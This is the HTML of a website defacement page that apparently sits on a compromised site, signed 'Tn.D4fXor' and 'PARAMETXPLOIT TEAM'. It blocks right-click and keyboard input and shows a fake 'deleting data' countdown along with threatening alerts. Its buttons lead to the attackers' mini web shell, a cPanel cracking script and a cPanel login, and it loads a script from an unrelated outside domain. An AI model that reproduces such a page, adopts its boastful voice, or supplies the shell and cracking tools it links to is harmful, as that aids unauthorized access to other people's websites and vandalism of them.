<html>
<head>
<title>Hacked by Tn.D4fXor</title>
<link rel="shortcut icon" href="https://i.pinimg.com/originals/47/38/2b/47382bf197b255c7582bfaea6245ab84.jpg">
<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>
<meta charset="utf-8">
<meta name="description" og:content="intelligence is not everything but ">
<meta name="og:description" content="money is everything">
<meta property="og:image" content="https://i.pinimg.com/originals/47/38/2b/47382bf197b255c7582bfaea6245ab84.jpg">
 <!-- sweetalert2
        #### jangan di ganti ####-->
        <script src="https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.all.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/sweetalert2@9"></script>
        <script src="http://www.ctwood.com.sg/style/alert.js" ></script>
<! -- Salju -->
<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script> 
<! -- Keluarga gw :v -->
<link href="https://fonts.googleapis.com/css2?family=Teko&display=swap" rel="stylesheet" type='text/css'> 
<link href="http://fonts.googleapis.com/css?family=Indie+Flower" rel="stylesheet" type='text/css'>
<link href="https://fonts.googleapis.com/css?family=Share+Tech+Mono" rel="stylesheet" type='text/css'>
<link href="https://fonts.googleapis.com/css2?family=Iceland&display=swap" rel="stylesheet" type='text/css'> 
<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css">
<body bgcolor="black" </body>
<! -- Background gw mank -->
<style type="text/css"> body{ background: #0a0a0a; height: 100vh; width: 100%; margin: 0; padding: 12px; display: flex; flex-direction: column; justify-content: center; align-items: center; background: linear-gradient(rgba(20, 10, 10, 0.3), rgba(0, 0, 0, 0.3)), repeating-linear-gradient(0, transparent, transparent 4px, black 10px, black 2px), url("https://wallpapertag.com/wallpaper/full/f/0/c/416824-full-size-dark-anime-wallpapers-1920x1080-screen.jpg"); background-size: cover; background-position: center; z-index: 1; } </style> 
<! -- css text kelap kelip by lutfie404 -->
<style>
<!-- style login shell -->
	<style type=text/css >
    .tombol{
  background:#2C97DF;
  color:white;
  border-top:0;
  border-left:0;
  border-right:0;
  border-bottom:5px solid #2A80B9;
  padding:10px 20px;
  text-decoration:none;
  font-family:sans-serif;
  font-size:11pt;
  
}
h2{
	font-family:Share Tech Mono;
	font-size:30px;
	}
input[type=password] {
	border: 1px solid #15CFF4;
	width: 300px;
	height: 25px;
	padding-left: 5px;
	margin: 10px auto;
	resize: none;
	background: transparent;
	color: gold;
	font-family:Share Tech Mono;
	font-size: 13px;
}
.page{
    		position: absolute;
    		margin: auto;
    		height: 50%;
    		top: 0; bottom: 0; left: 0; right:0;
     	}
  .blink_text {
-webkit-animation-name: blinker;
-webkit-animation-duration: 2s;
-webkit-animation-timing-function: linear;
-webkit-animation-iteration-count: infinite;

-moz-animation-name: blinker;
-moz-animation-duration: 2s;
-moz-animation-timing-function: linear;
-moz-animation-iteration-count: infinite;

 animation-name: blinker;
 animation-duration: 2s;
 animation-timing-function: linear;
 animation-iteration-count: infinite;

 color: red;
}
@-moz-keyframes blinker { 
 0% { opacity: 5.0;
 }
 50% { opacity: 0.0;
 }
 100% { opacity: 5.0;
 }
 }
@-webkit-keyframes blinker { 
 0% { opacity: 5.0;
 }
 50% { opacity: 0.0;
 }
 100% { opacity: 5.0;
 }
 }
@keyframes blinker { 
 0% { opacity: 5.0;
 }
 50% { opacity: 0.0;
 }
 100% { opacity: 5.0;
 }
 }
 
 #copy {
 	color: lime;
 	font-weight: bold;
 	font-family: Kelly Slab;
 }
 #copy a {
 	color: white;
 }
 #copy a:hover {
 	color: blue;
 }

body{
font-family: Kelly Slab;
background-color: black;
color:white;
}
#content tr:hover{
background-color: blue;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: #15CFF4;
}
table{
border: 1px #000000;
}
.s_tb{
border:1px silver;
}
a{
color:white;
font-size: 19px;
text-decoration:none;
}
a:hover{
color:green;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 2px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
h2{
font-family:Kelly Slab;
font-size:25px;
color:white;
}
h3{
font-size:35px;
}
h4{
font-size:15px;
font-family:Kelly Slab;
color:white;
}
.arif_table {;
	background:transparent;
	border:1px solid blue;
	font-family:Share Tech Mono;
    display:inline-block;
	cursor:pointer;
	color:#15CFF4;
	font-size:19x;
	font-weight:bold;
	padding:3px 20px;
	text-decoration:none;
	text-shadow:0px -1px 0px white;
       }
       .arif_table {;
	background:transparent;
	border:2px solid silver;
	font-family:Share Tech Mono;
	color:white;
	font-size:18x;
	font-weight:bold;
	padding:3px 29px;
	text-decoration:none;
	text-shadow:0px 0px 20px #15CFF4;
       }
     .potext {
	border: 1px solid #ffffff;
	width: 100%;
	height: 400px;
	padding-left: 5px;
	margin: 10px auto;
	resize: none;
	background: transparent;
	color: #ffffff;
	font-family:Share Tech mono;
	font-size: 13px;
}

    </style>
  <!-- javascript sweet alrt -->
    <script type="text/javascript" >
                  

                          function logcpanel(){
        	        Swal.fire({
  title: 'Login cpanel website stah?',
  icon: '',
  iconHtml: '?',
  confirmButtonText: 'Iya',
  cancelButtonText: 'Kgk,cpanel gw udh banyak',
  showCancelButton: true,
  showCloseButton: true
}).then((result) => {
        if (result.value) {
        location.replace(":2080");
        }
      })
        	    }

function cpanel(){
        	        Swal.fire({
  title: 'Mau crack cpanel kah om?',
  icon: '',
  iconHtml: '?',
  confirmButtonText: 'Hooh',
  cancelButtonText: 'Kgk',
  showCancelButton: true,
  showCloseButton: true
}).then((result) => {
        if (result.value) {
        location.replace("cpanel.php");
        }
      })
        	    }
        
        	    function mini(){
        	        Swal.fire({
  title: 'Apakah ingin Menuju Mini shell Gw?',
  icon: '',
  iconHtml: '?',
  confirmButtonText: 'iya dong',
  cancelButtonText: 'Kepencet :v',
  showCancelButton: true,
  showCloseButton: true
}).then((result) => {
        if (result.value) {
        location.replace("tobi.php");
        }
      })
        	    }

function hapus(){
let timerInterval
Swal.fire({
  title: 'Hapus Data!',
  icon: 'warning',
  html: 'Sedang Menghapus <b></b> gb',
  timer: 20000,
  timerProgressBar: false,
  onBeforeOpen: () => {
    Swal.showLoading()
    timerInterval = setInterval(() => {
      Swal.getContent().querySelector('b')
        .textContent = Swal.getTimerLeft()
    }, 100)
  },
  onClose: () => {
    clearInterval(timerInterval)
  }
}).then((result) => {
  if (
    /* Read more about handling dismissals below */
    result.dismiss === Swal.DismissReason.timer,
    swal.fire({
        
      title: 'Data anda',
      text: 'Ga di apa2 in :v',
       icon: 'success',
       showConfirmButton: false,
      
       
    })
  
  ){
    console.log('I was closed by the timer') // eslint-disable-line
  }
})
}

function ip(){
const ipAPI = 'https://api.ipify.org?format=json'

Swal.queue([{
  title: 'Perlihatkan ip ku',
  confirmButtonText: 'Show my IP',
  text:
    'ini hanya untuk memperlihatkan ' +
    'ip saja (Aman)',
  showLoaderOnConfirm: true,
  preConfirm: () => {
    return fetch(ipAPI)
      .then(response => response.json())
      .then(data => Swal.insertQueueStep(data.ip))
      .catch(() => {
        Swal.insertQueueStep({
          icon: 'error',
          title: 'maaf tidak bisa menampilkan ip anda'
        })
      })
  }
}])
}
    </script>
<! --- tombol lagu -- !>
<style type="text/css">
.lagu{
     background:transparent;
	border:2px solid silver;
	font-family:Share Tech Mono;
	color:white;
	font-size:18x;
	font-weight:bold;
	padding:3px 29px;
	text-decoration:none;
	text-shadow:0px 0px 20px #15CFF4;
  }
</style>
<! -- script lagu -- !>
<script> function play(){ var audio = document.getElementById('lagu'); audio.play(); } function liat(){ document.getElementById('galiat').style.visibility='visible'; } 
</script>
<! -- efek glitch/error2 -->
<style>h3{
       color: #000000; text-decoration: none; border-radius:0px; border:0px;margin:0px; padding:0px; animation:jembot 0.5s linear infinite;
       }
        @keyframes
         jembot{
          2%{color:white;}3%{transform:translate(2px,-10px) skewX(3500deg);}5%{transform:translate(0px,0px) skewX(0deg);}2% , 54%{transform:translateX(0px) skew(0deg);}55%{transform:translate(-2px,6px) skew(-5530deg);}56%{transform:translate(0px,0px) skew(0deg);}57%{transform:translate(4px,-10px) skew(-70deg);}58%{transform:translate(0px,0px) skew(0deg);}62%{transform:translate(0px,20px) skew(0deg);}63%{transform:translate(4px,-2px) skew(0deg);}90%{transform:translate(1px,3px); skew(-230deg);}95%{transform:translate(-7px,2px); skew(-120deg);}100%{transform:translate(0px,0px) skew(0deg);}
    </style>
<! -- Border atas -->
<center>

 <p class="blink_text"style="font-size:45px;color: white;text-shadow: 0px 0px 20px #00ffff , 0px 0px 20px #00ffff;font-family:Share Tech Mono;">Hacked 
<style="font-size:45px;color: #00ffff;text-shadow: 0px 0px 29px white , 0px 0px 29px white;font-family:Share Tech Mono;"> By Tn.D4fXor</p>
<br> 
<! -- Gambar tengah -->
<img src="https://a.top4top.io/p_1798n1dle0.jpg" width="200px"><br>
<! --  jam -->
<div id="clock" style="color: #696969; font-family: Kelly+Slab; font-size: 51px;"></div>
<! -- Code jam -->
<script type="text/javascript">
    <!--
    function showTime() {
        var a_p = "";
        var today = new Date();
        var curr_hour = today.getHours();
        var curr_minute = today.getMinutes();
        var curr_second = today.getSeconds();
        if (curr_hour < 24) {
            a_p = "";
        } else {
            a_p = "";
        }
        if (curr_hour == 0) {
            curr_hour = 24;
        }
        if (curr_hour > 24) {
            curr_hour = curr_hour - 24;
        }
        curr_hour = checkTime(curr_hour);
        curr_minute = checkTime(curr_minute);
        curr_second = checkTime(curr_second);
     document.getElementById('clock').innerHTML=curr_hour + " : " + curr_minute + " : " + curr_second + " " + a_p;
        }
 
    function checkTime(i) {
        if (i < 10) {
            i = "0" + i;
        }
        return i;
    }
    setInterval(showTime, 500);
    //-->
    </script><center>        
<center> 
<h3 onclick="alert('Your website has been locked by PARAMETXPLOIT TEAM');" 
<button class="lagu" >Delete This</button> 
<! -- kata2 mutiara gw :V -->
<h3 onclick="alert('Your website has been locked by PARAMETXPLOIT TEAM');"
<font face="Iceland" style="font-size:31px;">.:: Live Note ::.</font><br>
<font face="Iceland" style="font-size:40px;">There Are 2 Options<br></font>
<font face="Iceland" style="font-size:45px;" >HACKER OR BEING HACKED<br>
<br>
	<font face="Iceland" style="font-size:85px;" >*PARAMETXPLOIT TEAM*<br>
</h1>
</font>
<br>
</strong><br><strong>
<! -- Tombol2 -- !>
<button class="lagu" onclick="play();liat();"><font face="Teko" size="5" color="white" >PLAY MUSIC NYA EA	</font></button><audio id="lagu" src="https://j.top4top.io/m_1792z7ge10.mp3"></audio><br>
<button class="arif_table" onclick="mini()">Login My Shell</button> 
<button  class="arif_table" onclick="hapus()">Track me</button>
<button class="arif_table" onclick="cpanel()">Crack cpanel</button> 
<button class="arif_table" onclick="logcpanel()">login cpanel</button> 
<br><br><! -- thank all my friends -->
 </font>   </font>
<marquee width="60%%" behavior="alternate"><font face="Kelly Slab" size="4px"color=white style="text-shadow:0px 0px 50px black , 0px 0px 20px black
;" >     ~    C:\Users\Tn.D4fXor » Thank You To :  --  Tn.18  --  ./randiXploit  --  We are Anonymous. We are Legion. We do not forgive. We do not forget. Expect us.  --  PARAMETXPLOIT TEAM  --  ~     </font>
       </marquee>
<br>
<p class="blink_text" style="font-size:18px;color: white;text-shadow: 10px 10px 20px #00ffff font-family:Iceland;">Contact me?</font><br><a href='https://api.whatsapp.com/send?phone=+6282285944135&text=Hallo Tn.D4fXor I Found Your Contact'> <img alt='WhatsApp' src='https://www.freepngimg.com/thumb/whatsapp/77193-zubees-icons-foods-computer-halal-logo-whatsapp.png ' width='31' height='32'></a>  <a href='Link Yt'> <img alt='Youtube' src='http://assets.stickpng.com/images/580b57fcd9996e24bc43c545.png' width='34' height='31'></a> </footer></div><br>
</a>
<button class="arif_table" onclick="cpanel()">Thank You For Mr.T0B1 And Phoenix Cyber Team And All reserve</button></td></table>
<! -- lagu -->
<iframe width="0%" height="0" scrolling="no" frameborder="no" src="https://j.top4top.io/m_1792z7ge10.mp3"></iframe>
<! -- script alert2 -->
<script>alert('PARAMETXPLOIT TEAM IN HERE');</script>
<script>alert('Jangan Remehkan Kami');</script>
<script>alert('Jika Tidak Ingin Kami Remehkan');</script>
